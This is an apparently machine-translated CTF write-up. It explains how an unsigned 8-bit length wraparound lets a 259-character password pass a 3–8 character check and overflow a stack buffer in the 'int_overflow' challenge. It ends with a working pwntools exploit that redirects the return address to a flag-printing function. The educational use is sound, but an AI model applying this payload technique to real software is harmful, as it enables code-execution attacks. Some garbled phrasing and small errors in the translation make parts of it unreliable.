The basic concept 0x10
C language, comprising a substantially short integer data type short, long integer type int and long, each data type can be divided into signed and unsigned, we try to use int A = 0 such expressions, the default is to define a signed integer data a. For unsigned number, need to be displayed is declared as unsigned int A = 0 . Each data type will have its corresponding range, with the compiler related. We gcc compiler 64 as an example, as shown in the size range
| Types of | byte | range |
|---|---|---|
| short int | 2byte(word) | 0 ~ 32767(0 ~ 0x7fff) 32768 ~ -1(0x8000 ~ 0xffff) |
| unsigned short int | 2byte(word) | 0 ~ 65535(0 ~ 0xffff) |
| int | 4byte(dword) | 0 ~ 2147483647(0 ~ 0x7fffffff) -2147483648 ~ -1(0x80000000 ~ 0xffffffff) |
| unsigned int | 4byte(dword) | 0 ~ 4294967295(0 ~ 0xffffffff) |
| long int | 8byte(qword) | N: 0 ~ 0x7fffffffffffffff Negative: 0x8000000000000000 ~ 0xffffffffffffffff |
| unsigned long int | 8byte(qword) | 0 ~ 0xffffffffffffffff |
If the type of a corresponding data variable, its size exceeds the range, then the variable is equivalent to overflow. Integer overflow in itself does not cause code execution, but could trigger a stack overflow, which causes the effect of malicious code execution.
0x20 actual case
We int_overflow This question actually explain the use of integer overflow in the way, of course, used here as well stack overflow, to be able to achieve the effect of getshell. Topic Link. You can directly do question the official website can be downloaded to the local. This question is very simple, here we analyze, just to let everyone integer overflow have a better understanding.
0x21 analysis code
We take a look at security procedures compiler option
program just opened a stack unenforceable, that is no way to directly use ret2shellcode the way we execute injected code. But the stack address randomization protection and are not turned on, indicating that the program should be relatively simple use of it.
Run the following, look at the basic functions of the program.
It is simply a user name and password of the program, combined with IDA disassembler, look at the source code for possible problems.
Entry function did what's the problem, then continue positioning, we found a login function, tracking into the
passwd restrictions here in the 0x199 bytes, and subsequently there is a check function check_passwd password, go talk to
the variable v3 is unsigned __int8 type, i.e. 8 bits, is stored in the length of the variable s (i.e., passed in password), but v3 can be stored size unsigned 8-bit, i.e. a decimal number of 0 to 255, the maximum length s is 0x199 = 409 characters, obviously out of bounds.
Note that, with an 8-byte binary number i.e., signed, it can indicate that the
-128 to 127
unsigned, it can indicate that the
255
If the definition of an unsigned 8-bit binary number, more than 255, the overflow, such as unsigned char a = 257, then the actual a = 1 (cycle) .
Find points of vulnerability, and introduces rules overflow, how we want to take advantage of this loophole? There is also a problem of line 17, i.e. there is a copy of the string, the user enters the password will be copied to the dest, seen from the figure, i.e. dest from the bottom of the stack 0x14 ebp length. Boils down to this, there exists an integer overflow and stack overflow, the specific use, we are going to continue to analyze the snippet.
0x22 exploits
IDA's string open window, found a sensitive string CAT Flag , which is common among CTF title string flag, so our aim is to make the program run the string to the calling function.
Therefore, the need to find the address of the function (because the program does not open ALSR). So our aim is to perform the following functions
flag_addr = 0x0804868B
At this point, you might think, the direct use of stack overflow, we now enter a password directly to overflow, covering the return address to flag_addr not on the list yet, but you will find that this does not succeed, the fact that we have not used an integer overflow. The next step is to consider padding bytes problem. Here again analyze the compilation check_passwd function
function will first push that push ebp; mov ebp, esp; this is a common compilation function entry form, at the outlet of the same general will mov esp, ebp; pop ebp; and the program has a function at the end of the leave instruction. In the 32-bit program, this instruction is to say that we represent just two assembly statements. In other words, before the back cover function address, as well as a pop operations, the stack size 4 bytes of data, the need to cover before these 4 bytes that is covered, in order to achieve the jump point what_is_this function, write use script is as follows:
If the number of characters entered exceeds the 0x14, it will cover the contents of the stack, but in order to enter the coverage function, but also need password characters between 3-8, where it uses integer overflow, that is,
== >> (3-8) to select a random number between 259-264, 259 take here
**payload = "a" * (0x14 + 0x4) + flag_addr + "a" * (259 - 0x14 - 0x4 - 0x4)**
The final code looks exploit
from pwn import *
flag = 0x0804868B
sh = process("./int_overflow")
context(log_level="debug")
sh.sendlineafter("Your choice:", "1")
sh.sendlineafter("username:\n", "xiaoming")
payload = "a" * (0x14 + 0x4) + p32(flag) + "a" * (259 - 0x14 -0x4 - 0x4)
sh.sendlineafter("your passwd:\n", payload)
sh.recv()
sh.interactive()
Since our topic will be downloaded to the local cloud to run, the actual need to create a local file named flag, which enter the random content, you can print it out
0x30 summary
The difficulty lies not in the above-mentioned subject stack overflow, but rather the use of integer overflow, eventually filled a number of characters, it must be within a given range, in order to achieve the effect of exploits, otherwise unable to enter the appropriate code segment overflow .
